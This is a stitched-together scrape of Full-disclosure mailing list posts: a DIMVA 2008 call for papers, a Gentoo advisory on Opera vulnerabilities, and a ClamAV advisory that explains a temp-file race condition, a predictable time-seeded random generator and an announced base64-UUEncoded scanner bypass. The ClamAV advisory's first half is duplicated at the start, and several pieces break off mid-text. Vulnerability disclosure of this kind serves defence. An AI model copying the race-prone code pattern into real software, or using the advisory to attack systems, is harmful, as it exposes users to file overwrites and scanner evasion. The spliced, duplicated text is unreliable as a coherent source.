srand(tv.tv_usec+clock()); return rand() % max; } As you can see, every time cli_rndnum() is called, the random number generator is reinitialized with the microsecond component of the current time and an "approximation of the processor time used by the program" using the clock() function. This takes away a lot of randomness from the value returned by cli_rndnum(): as seed, more or less public information which should be relatively easy to be guessed by the attacker is used, making it possible to guess the value returned by rand(). Also, since the random number generator is reseeded every time cli_rndnum() is called, every returned value is directly computed from the seed. In addition, cli_rndnum() uses the modulo operator to "cut off" the random number at a maximum value, which is discouraged by virtually every documentation of the rand() function. The publication "Numerical Recipes in C: The Art of Scientific Computing"[0] says about the use of rand(): "If you want to generate a random integer between 1 and 10, you should always do it by using high-order bits, as in j=1+(int) (10.0*rand()/(RAND_MAX+1.0)); and never by anything resembling j=1+(rand() % 10); (which uses lower-order bits)." The function cli_gentempfd() is used throughout the whole ClamAV source code in numerous places, which means that all these places are affected by the race conditions. Ironically, the code also uses cli_gentemp() in several places to generate a random file name and then passes the file name to call to open() with the O_EXCL option enabled. The race condition was introduced to the ClamAV source code on August 31st, 2007, in SVN revision 3196. The first release that contains the bug was 0.92. Since then, the code has remained in the trunk of the SVN repository. == == Base64 UUEncoded Files Scanner Bypassing Details == == ClamAV contains functionality to unpack and scan different types of files, such as archive files. Beside others, UUEncoded files
[Full-disclosure] DIMVA 2008 - Call For Papers
Dear Colleagues, Attached please find the Call For Papers for DIMVA 2008, the Fifth GI International Conference on Detection of Intrusions & Malware, and Vulnerability Assessment; which is to be held in Paris, France, July 10-11, 2008. Complete information is available at http://www.dimva.org/dimva2008. Please feel free to distribute this announcement. We apologize if you receive multiple copies of this message. Best Regards, The DIMVA 2008 Organizing Committee - DIMVA 2008 Fifth GI International Conference on Detection of Intrusions & Malware, and Vulnerability Assessment Organized by the GI Special Interest Group SIDAR [1]http://dimva.org/dimva2008/ July 10-11th, 2008 Paris, France Call for Papers The annual DIMVA conference serves as a premier forum for advancing the state of the art in intrusion detection, malware detection, and vulnerability assessment. Each year DIMVA brings together international experts from academia, industry and government to present and discuss novel research in these areas. DIMVA is organized by the special interest group [2]Security - Intrusion Detection and Response of the [3]German Informatics Society (GI). The conference proceedings will appear in Springer's [4]Lecture Notes in Computer Science (LNCS) series. DIMVA solicits submission of high-quality, original scientific work. This year we invite two types of paper submissions: * Full papers, presenting novel and mature research results. Full papers are limited to 20 pages, prepared according to the instructions provided below. They will be reviewed by the program committee, and papers accepted for presentation at the conference will be included in the proceedings. * Short papers (extended abstracts), presenting original, still ongoing work that has not yet reached the maturity required for a full paper. Short papers are limited to 10 pages, prepared according to the instructions provided below. They will also be reviewed by the program committee, and papers accepted for presentation at the conference will be included in the proceedings (containing Extended Abstract in the title). DIMVA's scope includes, but is not restricted to the following areas: * Intrusion Detection + Approaches + Implementations + Prevention and response + Result correlation + Evaluation + Potentials and limitations + Operational experiences + Evasion and other attacks + Legal and social aspects * Malware + Techniques + Detection + Prevention and containment + Evaluation + Trends and upcoming risks + Forensics and recovery * Vulnerability Assessment + Vulnerabilities + Vulnerability detection + Vulnerability prevention + Classification and evaluation DIMVA particularly encourages papers that discuss the integration of intrusion, malware, and vulnerability detection in large-scale operational communication networks. Organizing Committee General Chair: Hervé Debar, France Telecom R&D, France ([EMAIL PROTECTED]) Program Chair: Diego Zamboni, IBM Zurich Research Lab, Switzerland ([EMAIL PROTECTED]) Sponsor Chair: Ludovic Mé, Supélec ([EMAIL PROTECTED]) Publicity Chair: Tadeusz Pietraszek, Google, Switzerland ([EMAIL PROTECTED]) Program Committee * Kostas Anagnostakis (Institute for Infocomm Research, Singapore) * Thomas Biege (SuSE, Germany) * David Brumley (Carnegie Mellon University, U.S.A.) * Roland Büschkes (RWE AG, Germany) * Weidong Cui (Microsoft Research) * Marc Dacier (Institut Eurecom, France) * Sven Dietrich (Stevens Institute of Technology, U.S.A.) * Holger Dreger (Siemens CERT, Germany) * Ulrich Flegel (University of Dortmund, Germany) * Marc Heuse (Baseline Security Consulting, Germany) * Thorsten Holz (University of Mannheim, Germany) * Ming-Yuh Huang (Boeing, U.S.A.) * Bernhard Hämmerli (HTA Lucerne, Switzerland) * Martin Johns (University of Hamburg, Germany) * Erland Jonsson (Chalmers University, Sweden) * Klaus Julisch (IBM Zurich Research Laboratory, Switzerland) * Christian Kreibich (International Computer Science Institute, U.S.A.) * Christopher Kruegel (Technical University of Vienna, Austria) * Pavel Laskov (Fraunhofer FIRST and University of Tuebingen, Germany) * Wenke Lee (Georgia Institute of Technology, U.S.A.) * John McHugh (Dalhousie University, Canada) * Michael Meier (University of Dortmund, Ger
[Full-disclosure] [ GLSA 200712-22 ] Opera: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200712-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Opera: Multiple vulnerabilities Date: December 30, 2007 Bugs: #202770 ID: 200712-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were discovered in Opera, allowing for the execution of arbitrary code and cross domain scripting. Background == Opera is a fast Web browser that is available free of charge. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/opera < 9.25 >= 9.25 Description === David Bloom reported two vulnerabilities where plug-ins (CVE-2007-6520) and Rich text editing (CVE-2007-6522) could be used to allow cross domain scripting. Alexander Klink (Cynops GmbH) discovered an issue with TLS certificates (CVE-2007-6521). Gynvael Coldwind reported that bitmaps might reveal random data from memory (CVE-2007-6524). Impact == A remote attacker could exploit these vulnerabilites, possibly leading to the execution of arbitrary code and cross domain scripting. Workaround == There is no known workaround at this time. Resolution == All Opera users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/opera-9.25" References == [ 1 ] CVE-2007-6520 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6520 [ 2 ] CVE-2007-6521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6521 [ 3 ] CVE-2007-6522 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6522 [ 4 ] CVE-2007-6524 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6524 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200712-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHd9KfuhJ+ozIKI5gRAr0iAJ9wF5YhZ3B2T9jsJiE/1uK10Uf1swCeJk5p cwmBruk15tQBOvmnfRqySSk= =DhPV -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TK53 Advisory #2: Multiple vulnerabilities in ClamAV
TK53 Advisory #2 12/29/2007 - Multiple vulnerabilities in ClamAV * Authors: Roflek of TK53 <[EMAIL PROTECTED]>, Lolek of TK53 <[EMAIL PROTECTED]> * Affected program: ClamAV (http://www.clamav.net/) * Affected versions: 0.92 * Overwiew: 1) ClamAV uses own functions to create temporary files. One such routine is vulnerable to a race condition attack. 2) ClamAV fails to properly check for base64-UUEncoded files, allowing bypassing of the scanner through the use of such files. 3) The sigtool utility included in the ClamAV distribution fails to handle created files in a secure way. == == Race Condition Vulnerability Details == == $SOURCE/libclamav/others.c (line 488): int cli_gentempfd(const char *dir, char **name, int *fd) { *name = cli_gentemp(dir); if(!*name) return CL_EMEM; *fd = open(*name, O_RDWR|O_CREAT|O_TRUNC|O_BINARY, S_IRWXU); if(*fd == -1) { cli_errmsg("cli_gentempfd: Can't create temporary file %s: %s\n", *name, strerror(errno)); free(*name); return CL_EIO; } return CL_SUCCESS; } This function, cli_gentempfd, uses a custom function to generate a (more or less) unique file name which is then opened, and the file descriptor is returned via an output parameter. The problem with this code is that a race condition exists: if the attacker is able to guess the generated file name, he/she is able to create such a named file between the call of cli_gentemp() and open(), making it possible to overwrite arbitrary files to which the user that runs ClamAV has write access with temporary data. A solution to fix this problem is to use the O_EXCL option for open(). This option prevents that the file will be opened if it already exists. So, how does the file name generation happen? First, cli_gentemp() determines the temporary directory. Users of the cli_gentemp() function can specify their own custom temporary directory. If none is specified, then the content of the TMPDIR environment variable is used. If the environment variable is unset, then P_tmpdir resp. "/tmp" are used. The generated format of the file name is $TMPDIR/clamav-$HASH, where $HASH is generated from a fixed 16 byte "salt" and 32 (more or less) random bytes. The salt is defined in the following way: static unsigned char name_salt[16] = { 16, 38, 97, 12, 8, 4, 72, 196, 217, 144, 33, 124, 18, 11, 17, 253 }; The random bytes are generated with an internal function cli_rndnum() which looks like this: unsigned int cli_rndnum(unsigned int max) { struct timeval tv; gettimeofday(&tv, (struct timezone *) 0); srand(tv.tv_usec+clock()); return rand() % max; } As you can see, every time cli_rndnum() is called, the random number generator is reinitialized with the microsecond component of the current time and an "approximation of the processor time used by the program" using the clock() function. This takes away a lot of randomness from the value returned by cli_rndnum(): as seed, more or less public information which should be relatively easy to be guessed by the attacker is used, making it possible to guess the value returned by rand(). Also, since the random number generator is reseeded every time cli_rndnum() is called, every returned value is directly computed from the seed. In addition, cli_rndnum() uses the modulo operator to "cut off" the random number at a maximum value, which is discouraged by virtually every documentation of the rand() function. The publication "Numerical Recipes in C: The Art of Scientific Computing"[0] says about the use of rand(): "If you want to generate a random integer between 1 and 10, you should always do it by using high-order bits, as in j=1+(int) (10.0*rand()/(RAND_MAX+1.0)); and never by anything resembling j=1+(rand() % 10); (which uses lower-order bits)." The function cli_gentempfd() is used throughout the whole ClamAV source code in numerous places, which means that all these places are affected by the race conditions. Ironically, the code also uses cli_gentemp() in several places to generate a random file name and then passes the file name to call to open() with the O_EXCL option enabled. The race condition was introduced to the ClamAV source code on August 31st, 2007, in SVN revision 3196. The first release that contains the bug was 0.92. Since then, the code has remained in the trunk of the SVN repository. == == Base64 UUEncoded Files Scanner Bypassing Details == == ClamAV contains functionality to unpack and scan different types of files, such as archive files. Beside others, UUEncoded files